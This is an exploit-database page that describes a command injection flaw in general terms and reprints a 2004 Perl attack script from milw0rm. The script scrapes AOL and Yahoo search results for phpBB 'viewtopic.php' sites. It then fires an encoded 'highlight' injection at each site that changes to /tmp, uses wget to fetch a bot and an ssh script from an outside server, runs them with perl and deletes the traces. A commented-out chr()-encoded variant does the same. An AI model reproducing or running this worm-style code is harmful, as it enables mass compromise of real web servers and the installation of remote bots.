Perl Code Vulnerability

vendor:

by:

9.8

CVSS

CRITICAL

Command Injection

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

This Perl code contains a command injection vulnerability that allows an attacker to execute arbitrary commands on the server. The vulnerability is caused by the insecure concatenation of user input into a system command. An attacker can manipulate the input to execute malicious commands.

Mitigation:

To mitigate this vulnerability, user input should be properly validated and sanitized before being used in system commands. It is recommended to use parameterized queries or prepared statements to prevent command injection attacks.

Source

Exploit-DB raw data:

#/usr/bin/perl

use IO::Socket;
use LWP::Simple;
@vul = "";
$a=0;
$numero = int rand(999);
$site = "search.aol.com";
$procura = "viewtopic.php%3Ft%3D$numero";

######################################
for($n=0;$n<90;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{if ($uber !~ /cache/)
{if ($uber !~ /"/)
{if ($uber !~ /google/)
{if ($uber !~ /216/)
{if ($uber =~/http/)
{if ($uber !~ /start=/)
{
if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++;
}}}}}}}}}
##########################
for($cadenu=1;$cadenu <= 99; $cadenu +=10){

@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=
1&b=$cadenu") or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;

$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
$uber =~ s/<wbr>//g;

if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++
}}

#########################


#$cmd = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)
%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%2
52echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252e
chr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr
(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr
(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(98)%
252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252
echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr
(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)
%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252
echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr
(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)
%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr'.'(99)%252echr(111)%25
2echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr
(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%25
2echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527';

$cmd = '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd /tmp;wget 
server.org/pdf/bot;perl bot;wget server.org/pdf/ssh.a;perl ssh.a;rm -rf ssh.*;rm -rf bot*%3B%
20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72
%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5
D%29.%2527';

$b = scalar(@vul);

for($a=0;$a<=$b;$a++)
{

$sitevul = $vul[$a].$cmd;
if($sitevul !~/http/){ $sitevul = 'http://'.$sitevul; }
$res = get($sitevul) or next;
}

# milw0rm.com [2004-12-25]